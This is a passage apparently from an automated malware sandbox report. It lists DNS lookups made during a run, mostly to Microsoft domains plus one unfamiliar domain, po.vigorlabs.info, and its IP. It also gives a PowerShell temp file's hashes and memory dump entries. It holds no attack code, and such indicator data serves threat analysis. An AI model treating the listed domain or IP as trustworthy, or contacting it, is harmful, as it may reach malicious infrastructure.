    8.8.8.8.in-addr.arpa
    dns
    740 B
    1.6kB
    11
    10

    DNS Request

    8.8.8.8.in-addr.arpa

    DNS Request

    ocsp.digicert.com

    DNS Response

    192.229.221.95

    DNS Request

    arc.msn.com

    DNS Response

    20.223.35.26

    DNS Request

    26.35.223.20.in-addr.arpa

    DNS Request

    195.61.62.23.in-addr.arpa

    DNS Request

    tse1.mm.bing.net

    DNS Response

    204.79.197.200
    13.107.21.200

    DNS Request

    ctldl.windowsupdate.com

    DNS Response

    2.17.197.240
    2.17.197.249

    DNS Request

    arc.msn.com

    DNS Response

    20.223.36.55

    DNS Request

    54.120.234.20.in-addr.arpa

    DNS Request

    nexusrules.officeapps.live.com

    DNS Request

    nexusrules.officeapps.live.com

    DNS Response

    52.111.243.30

  • 8.8.8.8:53
    17.160.190.20.in-addr.arpa
    dns
    830 B
    2.0kB
    12
    12

    DNS Request

    17.160.190.20.in-addr.arpa

    DNS Request

    po.vigorlabs.info

    DNS Response

    45.128.153.41

    DNS Request

    172.210.232.199.in-addr.arpa

    DNS Request

    www.bing.com

    DNS Response

    23.62.61.195
    23.62.61.176
    23.62.61.162
    23.62.61.185
    23.62.61.169
    23.62.61.193
    23.62.61.57
    23.62.61.59
    23.62.61.72

    DNS Request

    arc.msn.com

    DNS Response

    20.223.35.26

    DNS Request

    200.197.79.204.in-addr.arpa

    DNS Request

    240.197.17.2.in-addr.arpa

    DNS Request

    ris.api.iris.microsoft.com

    DNS Response

    20.234.120.54

    DNS Request

    55.36.223.20.in-addr.arpa

    DNS Request

    30.243.111.52.in-addr.arpa

    DNS Request

    self.events.data.microsoft.com

    DNS Response

    40.79.173.40

    DNS Request

    40.173.79.40.in-addr.arpa

MITRE ATT&CK Matrix


Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wwkqqyeb.b3o.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/4972-8-0x0000018B2DE30000-0x0000018B2DE52000-memory.dmp

    Filesize

    136KB

  • memory/4972-9-0x00007FFB71050000-0x00007FFB71B12000-memory.dmp

    Filesize

    10.8MB

  • memory/4972-10-0x0000018B2DD80000-0x0000018B2DD90000-memory.dmp

    Filesize

    64KB

  • memory/4972-11-0x0000018B2DD80000-0x0000018B2DD90000-memory.dmp

    Filesize

    64KB

  • memory/4972-12-0x00007FFB71050000-0x00007FFB71B12000-memory.dmp

    Filesize

    10.8MB

  • memory/4972-13-0x0000018B2DD80000-0x0000018B2DD90000-memory.dmp

    Filesize

    64KB

  • memory/4972-14-0x0000018B2DD80000-0x0000018B2DD90000-memory.dmp

    Filesize

    64KB
